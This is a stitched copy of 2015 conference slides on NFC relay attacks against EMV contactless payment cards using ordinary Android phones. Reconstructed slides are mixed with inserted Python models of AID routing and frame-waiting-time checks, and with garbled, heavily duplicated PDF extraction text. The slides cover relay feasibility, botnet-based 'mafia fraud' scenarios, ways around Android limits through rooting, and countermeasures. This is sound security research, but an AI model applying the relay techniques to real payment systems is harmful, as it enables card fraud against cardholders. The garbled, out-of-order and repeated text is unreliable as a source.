• Android 2.3.3 Gingerbread (API level 10): NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), NfcF (JIS 6319-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
• Android CyanogenMod OS 9.1 (thanks to Doug Yeager): IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B)
• Android 4.2 Jelly Bean (API level 17): NfcBarcode
• Android 4.4 KitKat (API level 19): NfcAdapter.ReaderCallback added
• NFC operation modes supported: reader/writer, peer-to-peer and card emulation in software; card emulation in hardware

Android and NFC: A Tale of L♥ve (II)
Digging into the Android NFC stack

• Event-driven framework, nice API support
• Two native implementations (depending on the built-in NFC chip):
  • libnfc-nxp
  • libnfc-nci
• NXP dropped in favour of NCI:
  • Open architecture, not focused on a single chip family
  • Open interface between the NFC Controller (NFCC) and the Device Host (DH)
  • Standard proposed by the NFC Forum


Android and NFC: A Tale of L♥ve (III)
Digging into the Android NFC stack: Reader/Writer mode

• Not allowed to be set directly → Android activity
• The Android NFC service selects apps according to the tag definition in the Manifest file
• At low level, libnfc-nci uses a reliable mechanism of queues and message passing: the General Kernel Interface (GKI)
  • Makes communication between layers and modules easier

[Diagram: path of a transceive call through the stack]
User App → Tag (NFC developer framework) → NfcService: mTagService.transceive → IPC → TagService → DeviceHost.TagEndpoint <<realize>> NativeNfcTag → JNI: doTransceive → NativeNfcTag.cpp (System NFC Library) → libnfc-nci

Android and NFC: A Tale of L♥ve (IV)
Digging into the Android NFC stack: HCE mode

• A service must be implemented to process commands and replies
  • HostApduService abstract class and processCommandApdu method
• AID-based routing service table
  • This means you need to declare in advance what AID you handle

Android and NFC: A Tale of L♥ve (V)
Digging into the Android NFC stack: Summary

Description                                          Language(s)   Dependency                  OSS
NFC developer framework (com.android.nfc package)    Java, C++     API level                   Yes
System NFC library (libnfc-nxp or libnfc-nci)        C/C++         Manufacturer                Yes
NFC Android kernel driver                            C             Hardware and manufacturer   Yes
NFC firmware (/system/vendor/firmware directory)     ARM Thumb     Hardware and manufacturer   No

Some useful links:
https://android.googlesource.com/platform/frameworks/base/+/master/core/java/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/src/com/android/nfc
https://android.googlesource.com/platform/packages/apps/Nfc/+/master/nci
https://android.googlesource.com/platform/external/libnfc-nci/+/master/src
http://nfc-forum.org/our-work/specifications-and-application-documents/specifications/nfc-controller-interface-nci-specifications
http://www.cardsys.dk/download/NFC_Docs/NFC%20Controller%20Interface%20(NCI)%20Technical%20Specification.pdf
http://www.datasheet4u.com/PDF/845670/BCM20793S.html
http://www.datasheet4u.com/PDF/845671/BCM20793SKMLG.html

Android and NFC: A Tale of L♥ve (VI)
Some remarkable limitations

Limitation 1: Dishonest verifier communicates with a MIFARE Classic
• libnfc-nci does not allow sending raw ISO/IEC 14443-3 commands
  • Caused by the CRC computation performed by the NFCC
  • Overcome if the NFCC is modified
• EMV contactless cards are IsoDep, fully ISO/IEC 14443-compliant

Limitation 2: Dishonest prover communicates with an honest verifier
• Device in HCE mode
  • AID must be known in advance
  • Overcome if the device is rooted
• The Xposed framework may help to overcome this issue, but needs root permissions
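The AID-based routing described on the HCE slide and again under Limitation 2, modelled in Python as an added example (not the talk's app and not Android code): a service only ever sees the terminal's APDUs for an AID it registered before the session started. The PPSE AID is the real EMV payment directory name; DEMO_AID, the handlers, the AidRouter class and the traffic in demo() are constructed for this example.

```python
"""AID-based routing as Android HCE applies it, modelled in plain Python.

Added example, not code from the talk's app or from Android. A contactless
transaction opens with an ISO/IEC 7816-4 SELECT by AID from the terminal; the
NFC service looks the AID up in a table that every HostApduService filled in
advance through its manifest, and only a service that registered that AID
receives the APDU. That is why the honest prover's AID must be known before
the emulation starts. PPSE_AID is the real EMV value; DEMO_AID, the handlers
and the traffic in demo() are constructed for this example.
"""
from typing import Callable, Dict, List, Optional, Tuple

Handler = Callable[[bytes], bytes]

# Real ISO/IEC 7816-4 status words.
SW_OK = b"\x90\x00"
SW_FILE_NOT_FOUND = b"\x6a\x82"             # no application under that AID

PPSE_AID = b"2PAY.SYS.DDF01"                # real: 325041592E5359532E4444463031
DEMO_AID = bytes.fromhex("F0010203040506")  # constructed, proprietary RID space


def build_select(aid: bytes) -> bytes:
    """C-APDU SELECT by DF name: CLA 00, INS A4, P1 04, P2 00, Lc, AID, Le 00."""
    return bytes([0x00, 0xA4, 0x04, 0x00, len(aid)]) + aid + b"\x00"


def parse_select_by_aid(apdu: bytes) -> Optional[bytes]:
    """Return the AID when `apdu` is a well-formed SELECT by DF name, else None."""
    if len(apdu) < 5 or apdu[:3] != b"\x00\xa4\x04":
        return None
    lc = apdu[4]
    aid = apdu[5:5 + lc]
    if len(aid) != lc or not 5 <= lc <= 16:  # ISO/IEC 7816-4: AIDs are 5..16 bytes
        return None
    return aid


class AidRouter:
    """Routing table plus the 'currently selected service' of one tag session.

    register() stands for the aid-filter entries a HostApduService declares in
    its manifest; route() stands for the dispatch performed on every C-APDU.
    """

    def __init__(self) -> None:
        self._table: Dict[bytes, Handler] = {}
        self._selected: Optional[bytes] = None

    def register(self, aid: bytes, handler: Handler) -> None:
        self._table[aid] = handler

    def on_deactivated(self) -> None:
        """Field lost or card deselected: the session and its selection end."""
        self._selected = None

    def route(self, apdu: bytes) -> Tuple[Optional[bytes], bytes]:
        """Dispatch one C-APDU; returns (AID of the service reached or None, R-APDU)."""
        aid = parse_select_by_aid(apdu)
        if aid is not None:
            handler = self._table.get(aid)
            if handler is None:
                # Nobody declared this AID in advance: the APDU reaches no service
                # (model choice: the previous selection is dropped as well).
                self._selected = None
                return None, SW_FILE_NOT_FOUND
            self._selected = aid
            return aid, handler(apdu)
        if self._selected is None:
            # Non-SELECT command while no application is selected.
            return None, SW_FILE_NOT_FOUND
        # Follow-up commands go to the service selected earlier in this session.
        return self._selected, self._table[self._selected](apdu)


def demo() -> Dict[str, Tuple[Optional[bytes], bytes]]:
    """Run constructed terminal traffic through a router with two registered AIDs."""
    router = AidRouter()
    # Constructed replies: a real PPSE answers with an FCI template listing the
    # payment applications; here only the status word matters.
    router.register(PPSE_AID, lambda apdu: SW_OK)
    router.register(DEMO_AID, lambda apdu: b"\x70\x00" + SW_OK)
    traffic: List[Tuple[str, bytes]] = [
        ("select_ppse", build_select(PPSE_AID)),
        ("read_record", bytes.fromhex("00B2010C00")),    # READ RECORD after the SELECT
        ("select_demo", build_select(DEMO_AID)),
        ("select_unknown", build_select(bytes.fromhex("A000000099887766"))),
        ("read_after_miss", bytes.fromhex("00B2010C00")),  # nothing selected any more
    ]
    return {name: router.route(apdu) for name, apdu in traffic}
```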


Android and NFC: A Tale of L♥ve (V)
Some remarkable limitations and remarks

Limitation 3: Dishonest prover and dishonest verifier communicate through a non-reliable peer-to-peer relay channel
• ISO/IEC 14443-4 defines the Frame Waiting Time as
  FWT = 256 · (16 / fc) · 2^FWI, 0 ≤ FWI ≤ 14, where fc = 13.56 MHz
• FWT ∈ [500 µs, 5 s] → relay is theoretically possible when the delay is ≤ 5 s

Concluding remarks
• Any NFC-enabled device running OTS Android ≥ 4.4 can perform an NFC passive relay attack at APDU level when the specific AID of the honest prover is known and an explicit SELECT is performed
• Any communication involving an APDU-compliant NFC tag (i.e. MIFARE DESFire EV1, Inside MicroPass or Infineon SLE66CL) can also be relayed

And now, let's move to the practice


Relay Attack Implementation (I)
Experiment configuration

• PoS device: Ingenico IWL280 with GPRS + NFC support
• Android app developed (±2000 LOC)
• Two OTS Android NFC-capable devices
  • One constraint: only the dishonest prover must run Android ≥ 4.4


Relay Attack Implementation (II)
Threat Scenarios: Scenario 1

Distributed Mafia Fraud
[Figure: a botmaster coordinating several bots]

Relay Attack Implementation (III)
Threat Scenarios: Scenario 2

Hiding Fraud Locations

Relay Attack Implementation (IV)
Resistant Mechanisms

Brief summary of resistant mechanisms
• Distance-bounding protocols
  • Upper-bounding the physical distance using the Round-Trip Time of cryptographic challenge-response messages
• Timing constraints
  • Not enforced in current NFC-capable systems
  • The protocol itself allows timing-extension commands
• Physical countermeasures
  • Whitelisting/Blacklisting: random UID in HCE mode → unfeasible
  • RFID blocking covers
  • Physical button/switch activation
  • Secondary authentication methods (e.g. on-card fingerprint scanners)
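The Frame Waiting Time formula from Limitation 3 and the "Timing constraints" countermeasure above, worked through in Python as an added example (not the talk's code): it computes FWT from FWI, applies the latency check a terminal could enforce against a relay, and shows how the standard's own S(WTX) timing extension widens the budget. The Exchange class, allowed_budget_s and the SAMPLE timings are this example's own constructions, not measurements from the talk.

```python
"""Frame Waiting Time budget of ISO/IEC 14443-4 and a terminal-side latency check.

Added example, not code from the talk. It carries the slide's formula
FWT = 256 * (16 / fc) * 2**FWI, 0 <= FWI <= 14, fc = 13.56 MHz, through to
numbers, then applies the check a terminal could enforce against a relay
(answer arrives after FWT -> reject) to constructed transaction timings. It
also shows why the 'Timing constraints' countermeasure is weak: S(WTX), the
timing-extension command of the same standard, multiplies the budget by
WTXM (1..59), so a slow answer becomes legal whenever an extension is granted.
Exchange, allowed_budget_s and SAMPLE are this example's own constructions.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

FC_HZ = 13.56e6            # carrier frequency fc
FWI_MIN, FWI_MAX = 0, 14   # Frame Waiting Integer range
WTXM_MAX = 59              # largest multiplier an S(WTX) request may carry


def fwt_seconds(fwi: int) -> float:
    """FWT = 256 * (16 / fc) * 2^FWI, exactly the slide's definition."""
    if not FWI_MIN <= fwi <= FWI_MAX:
        raise ValueError(f"FWI must be in [{FWI_MIN}, {FWI_MAX}], got {fwi}")
    return 256 * (16 / FC_HZ) * 2 ** fwi


def fwt_range_us() -> Tuple[float, float]:
    """Smallest and largest FWT in microseconds over all legal FWI values."""
    return fwt_seconds(FWI_MIN) * 1e6, fwt_seconds(FWI_MAX) * 1e6


@dataclass
class Exchange:
    label: str
    fwi: int           # FWI the card announced in its ATS
    latency_s: float   # end of the terminal's command to start of the card's answer
    wtxm: int = 0      # 0 = no S(WTX) requested, otherwise the multiplier 1..59


def allowed_budget_s(x: Exchange) -> float:
    """Time the terminal must wait before it may treat the answer as missing."""
    base = fwt_seconds(x.fwi)
    if x.wtxm == 0:
        return base
    if not 1 <= x.wtxm <= WTXM_MAX:
        raise ValueError(f"WTXM must be in [1, {WTXM_MAX}], got {x.wtxm}")
    return base * x.wtxm      # temporary FWT granted for the next answer only


def check(x: Exchange) -> str:
    """'late' when the answer lands outside the budget, 'ok' otherwise."""
    return "ok" if x.latency_s <= allowed_budget_s(x) else "late"


def run(exchanges: List[Exchange]) -> Dict[str, str]:
    """Verdict per exchange, keyed by its label."""
    return {x.label: check(x) for x in exchanges}


# Constructed timings, not measurements: a card on the terminal answers within
# milliseconds; a relay over a mobile link needs a few hundred milliseconds.
SAMPLE = [
    Exchange("card on terminal", fwi=8, latency_s=0.020),           # budget ~77 ms
    Exchange("relayed, no WTX", fwi=8, latency_s=0.350),            # over budget
    Exchange("relayed, WTX x10", fwi=8, latency_s=0.350, wtxm=10),  # budget ~773 ms
    Exchange("card at max FWI", fwi=14, latency_s=0.350),           # budget ~4.95 s
]

if __name__ == "__main__":
    lo, hi = fwt_range_us()
    print(f"FWT range: {lo:.0f} us .. {hi / 1e6:.2f} s")
    for label, verdict in run(SAMPLE).items():
        print(f"{label:18s} {verdict}")
```

Only the first relayed exchange is caught; a larger FWI in the card's ATS or a granted S(WTX) puts the same 350 ms back inside the budget, which is the slide's point that timing alone does not stop a relay.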


Related Work
On relay attacks

• 2005-2009: First works, built on specific hardware
• 2010: Nokia mobile phones with NFC capability plus a Java MIDlet app
• 2012-2013: Relay attacks on Android accessing Secure Elements
  • A SE securely stores data associated with credit/debit cards
  • Needs a non-OTS Android device
• 2014: Active relay attacks with custom hardware and custom Android firmware
• Several works studied the delay upon the relay channel
  • Relay over long distances is feasible → latency isn't a hard constraint

Ask us for specific references, too many names for a single slide


Conclusions (I)

• Security of NFC is based on the physical proximity concern
• NFC threats: eavesdropping, data modification, relay attacks
• Android NFC-capable devices are rising
  • They can be abused to interact with cards in their proximity

Conclusions
• Review of the Android NFC stack
• Proof-of-Concept of relay attacks using Android OTS devices
• Threat scenarios introduced
• Virtual pickpocketing attacks may appear before long


Conclusions (II)
But then, what the hell can I do? Should I run away?


Conclusions (III)

Future Work
• Develop a botnet infrastructure and earn money
• Timing constraints of Android HCE mode
• Try active relay attacks within EMV contactless cards

Acknowledgments
• Spanish National Cybersecurity Institute (INCIBE)
• University of León under contract X43
• HITB staff

And thanks to all for hearing us

Visit http://vwzq.net/relaynfc for more info about the project

Conclusions (III)

Future WorkDevelopa botnetinfrastructureandearnmoney

Timing constraints of Android HCE mode

Try active relay attacks within EMV contactless cards

AcknowledgmentsSpanish National Cybersecurity Institute (INCIBE)

University of Leon under contract X43

HITB staff

And thanks to all for hearing us

Visit httpvwzqnetrelaynfc for more info about the project

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 35 36

Relay Attacks in EMV Contactless Cardswith Android OTS Devices

Jose Viladagger Ricardo J RodrıguezDagger

pvtolkiengmailcom rjrodriguezunileoneslaquo All wrongs reversed

daggerComputer Science and daggerResearch Institute ofSystems Engineering Dept Applied Sciences in Cybersecurity

University of Zaragoza Spain University of Leon Spain

May 28 2015

Hack in the Box 2015Amsterdam (Nederland)

  • Introduction
  • Background
    • EMV Contactless Cards
    • Relay Attacks and Mafia Frauds
      • Android and NFC A Tale of Lve
        • Evolution of NFC Support in Android
        • Practical Implementation Alternatives in Android
          • Relay Attack Implementation
            • Demo experiment
            • Threat Scenarios
            • Resistant Mechanisms
              • Related Work
              • Conclusions
Page 26: Attacks in EMV Contactless Cards with Android OTS ... - · PDF fileRelay Attacks in EMV Contactless Cards with Android OTS Devices Jose Vila´ y, Ricardo J. Rodr´ıguez z pvtolkien@gmail.com,

Background (III)

Relay attacksldquoOn Numbers and Gamesrdquo J H Conway(1976)

Mafia frauds ndash Y Desmedt (SecuriComrsquo88)

P minusrarr V communication link P minusrarr V

Real-time fraud where a fraudulent prover P and verifierV cooperateHonest prover and verifier contactless card and Point-of-Sale terminalDishonest prover and verifier two NFC-enabled Android devices

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 16 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 17 36

Android and NFC A Tale of Lrve (I)Recap on evolution of Android NFC support

Android 42 Jelly Bean (API level 17)

NfcBarcode

IsoPcdB(ISOIEC 14443-4B)

IsoPcdA(ISOIEC 14443-4A)

Android CyanogenMod OS 91

NfcA(ISOIEC 14443-3A)

NfcB(ISOIEC 14443-3B)

NfcV(ISOIEC 15693)

IsoDep(ISOIEC 14443-4)

NfcF(JIS 6319-4)

Ndef

Android 233 Gingerbread (API level 10)

NdefFormatable MifareClassic

MifareUltralight

Android 44 KitKat (API level 19)

thanks to Doug Year

Software

ReaderWriter

Peer-to-peer

Card-emulation

Hardware

Card-emulation

Software

ReaderWriter

Peer-to-peer

Hardware

Card-emulation NfcAdapterReaderCallback

added

NFC

op

erati

on

mod

es

su

pp

orte

d

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 18 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (II)Digging into Android NFC stack

Event-driven framework nice API supportTwo native implementations (depending on built-in NFC chip)

libnfc-nxp

libnfc-nci

NXP dropped in favour of NCIOpen architecture not focused on a single family chipOpen interface between the NFC Controller and the DHStandard proposed by NFC Forum

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 19 36

Android and NFC A Tale of Lrve (III)Digging into Android NFC stack ndash ReaderWriter mode

Not allowed to be set directlyrarr Android activity

Android NFC service selects apps according to tag definition ofManifest fileIn low-level libnfc-nci uses reliable mechanism of queues andmessage passing ndash General Kernel Interface (GKI)

Makes communication between layers and modules easier

User App

Tag

NFC developer framework

NfcService

mTagServicetransceive

IPC

TagService

DeviceHostTagEndPoint

ltltrealizegtgt

NativeNfcTag

JNI

doTransceive

System NFC Library

NativeNfcTagcpp

libnfc-nci

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 20 36

Android and NFC A Tale of Lrve (IV)Digging into Android NFC stack ndash HCE mode

A service must be implemented to process commands and replies

HostApduService abstract class and processCommandApdu methodAID-based routing service table

This means you need to declare in advance what AID you handle

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 21 36

Android and NFC A Tale of Lrve (V)Digging into Android NFC stack ndash Summary

Description Language(s) Dependency OSSNFC developer framework Java C++ API level Yes

(comandroidnfc package)System NFC library CC++ Manufacturer Yes(libnfc-nxp or libnc-nci)

NFC Android kernel driver C Hardware and manufac-turer

Yes

NFC firmware ARM Thumb Hardware and No(systemvendorfirmware directory) manufacturer

Some useful linkshttpsandroidgooglesourcecomplatformframeworksbase+mastercorejavaandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+mastersrccomandroidnfc

httpsandroidgooglesourcecomplatformpackagesappsNfc+masternci

httpsandroidgooglesourcecomplatformexternallibnfc-nci+mastersrc

httpnfc-forumorgour-workspecifications-and-application-documentsspecifications

nfc-controller-interface-nci-specifications

httpwwwcardsysdkdownloadNFC_DocsNFC20Controller20Interface20(NCI)20Technical

20Specificationpdf

httpwwwdatasheet4ucomPDF845670BCM20793Shtml

httpwwwdatasheet4ucomPDF845671BCM20793SKMLGhtml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 22 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (VI)Some remarkable limitations

Limitation 1Dishonest verifier communicates with a MIFARE Classiclibnfc-nci do not allow sending raw ISOIEC 14443-3 commands

Caused by the CRC computation performed by the NFCC

Overcome whether NFCC is modified

EMV contactless cards are IsoDep fully ISOIEC 14443-compliant

Limitation 2Dishonest prover communicates with a honest verifierDevice in HCE mode

AID must be known in advance

Overcome whether device is rooted

Xposed framework may help to overcome this issue but needs rootpermissions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 23 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice uml

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Android and NFC A Tale of Lrve (V)Some remarkable limitations and remarks

Limitation 3Dishonest prover and a dishonest verifier communicate through anon-reliable peer-to-peer relay channelISOIEC 14443-4 defines the Frame Waiting Time asFWT = 256 middot (16fc) middot 2FWI 0 le FWI le 14 where fc = 1356 MHz

FWT isin [500micros 5s]rarr relay is theoretically possible when delay is le 5s

Concluding RemarksAny NFC-enabled device running OTS Android ge 44 can perform anNFC passive relay attack at APDU level when the specific AID of thehonest prover is known and an explicit SELECT is performed

Any communication involving a APDU-compliant NFC tag (ieMIFARE DESFire EV1 Inside MicroPass or Infineon SLE66CL) canalso be relayed

And now letrsquos move to the practice umlJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 24 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 25 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (I)Experiment configuration

PoS device Ingenico IWL280 with GRPS + NFC support

Android app developed (plusmn2000 LOC)Two OTS Android NFC-capable devices

One constraint only dishonest prover must run an Android ge 44

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 26 36

Relay Attack Implementation (II)Threat Scenarios ndash Scenario 1

Distributed Mafia Fraud

BOT

BOTMASTER

BOT

BOT

BOT

BOT

BOT

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 27 36

Relay Attack Implementation (III)Threat Scenarios ndash Scenario 2

Hiding Fraud Locations

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 28 36

Relay Attack Implementation (IV)Resistant Mechanisms

Brief summary of resistant mechanismsDistance-bounding protocols

Upper bounding the physical distance using Round-Trip-Time ofcryptographic challenge-response messages

Timing constraintsNot enforced in current NFC-capable systemsThe own protocol allows timing extension commands

Physical countermeasuresWhitelistingBlacklisting random UID in HCE moderarr unfeasibleRFID blocking coversPhysical buttonswitch activationSecondary authentication methods (eg on-card fingerprint scanners)

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 29 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 30 36

Related WorkOn relay attacks

2005-2009 First works built on specific hardware

2010 Nokia mobile phones with NFC capability plus a Java MIDletapp

2012-2013 Relay attacks on Android accessing to Secure ElementsA SE securely stores data associated with creditdebitcardsNeeds a non-OTS Android device

2014 Active relay attacks with custom hardware and customAndroid firmware

Several works studied delay upon relay channel

Relay over long distances are feasiblerarr latency isnrsquot a hardconstraint

Ask us for specific references too many names for a single slideJ Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 31 36

Agenda

1 Introduction

2 BackgroundEMV Contactless CardsRelay Attacks and Mafia Frauds

3 Android and NFC A Tale of LrveEvolution of NFC Support in AndroidPractical Implementation Alternatives in Android

4 Relay Attack ImplementationDemo experimentThreat ScenariosResistant Mechanisms

5 Related Work

6 Conclusions

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 32 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (I)

Security of NFC is based on the physical proximity concern

NFC threats eavesdropping data modification relay attacksAndroid NFC-capable devices are rising

Abuse to interact with cards in its proximity

ConclusionsReview of Android NFC stackProof-of-Concept of relay attacks using Android OTS devices

Threat scenarios introduced

Virtual pickpocketing attack may appear before long

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 33 36

Conclusions (II)But then what the hell can I do Should I run away

J Vila R J Rodrıguez Relay Attacks in EMV Contactless Cardswith Android OTS Devices HITBrsquo15 AMS 34 36


Conclusions (III)

Future Work
    Develop a botnet infrastructure and earn money
    Timing constraints of Android HCE mode
    Try active relay attacks against EMV contactless cards

Acknowledgments
    Spanish National Cybersecurity Institute (INCIBE)
    University of León, under contract X43
    HITB staff

And thanks to all for listening to us!

Visit http://vwzq.net/relaynfc for more info about the project


Android and NFC: A Tale of L♥ve (I). Recap on the evolution of Android NFC support

(Timeline figure on the slide, reconstructed: tag technologies and NFC operation modes supported by each release.)

Android 2.3.3 Gingerbread (API level 10)
    Tag technologies: NfcA (ISO/IEC 14443-3A), NfcB (ISO/IEC 14443-3B), NfcF (JIS 6319-4), NfcV (ISO/IEC 15693), IsoDep (ISO/IEC 14443-4), Ndef, NdefFormatable, MifareClassic, MifareUltralight
    Operation modes: Reader/Writer and Peer-to-peer in software; Card-emulation only in hardware

Android CyanogenMod OS 9.1 (thanks to Doug Yeager)
    Tag technologies: IsoPcdA (ISO/IEC 14443-4A), IsoPcdB (ISO/IEC 14443-4B)
    Operation modes: Reader/Writer, Peer-to-peer and Card-emulation in software; Card-emulation in hardware

Android 4.2 Jelly Bean (API level 17)
    Tag technologies: NfcBarcode

Android 4.4 KitKat (API level 19)
    Operation modes: Card-emulation in software (HCE) and in hardware; NfcAdapter.ReaderCallback added

Android and NFC: A Tale of L♥ve (II). Digging into the Android NFC stack

Event-driven framework, nice API support.

Two native implementations (depending on the built-in NFC chip):
    libnfc-nxp
    libnfc-nci

NXP dropped in favour of NCI:
    Open architecture, not focused on a single chip family
    Open interface between the NFC Controller (NFCC) and the Device Host (DH)
    Standard proposed by the NFC Forum


Android and NFC: A Tale of L♥ve (III). Digging into the Android NFC stack: Reader/Writer mode

Not allowed to be set directly → requires an Android Activity.

The Android NFC service selects apps according to the tag definition in their Manifest file.

At low level, libnfc-nci uses a reliable mechanism of queues and message passing, the General Kernel Interface (GKI), which makes communication between layers and modules easier.

(Diagram on the slide, reconstructed as the path of a transceive call)
    User App → Tag (NFC developer framework) → mTagService.transceive → IPC → TagService (NfcService) → DeviceHost.TagEndpoint, realized by NativeNfcTag → JNI doTransceive → NativeNfcTag.cpp (system NFC library) → libnfc-nci

Android and NFC: A Tale of L♥ve (IV). Digging into the Android NFC stack: HCE mode

A service must be implemented to process commands and replies:
    HostApduService abstract class and its processCommandApdu method
    AID-based routing service table

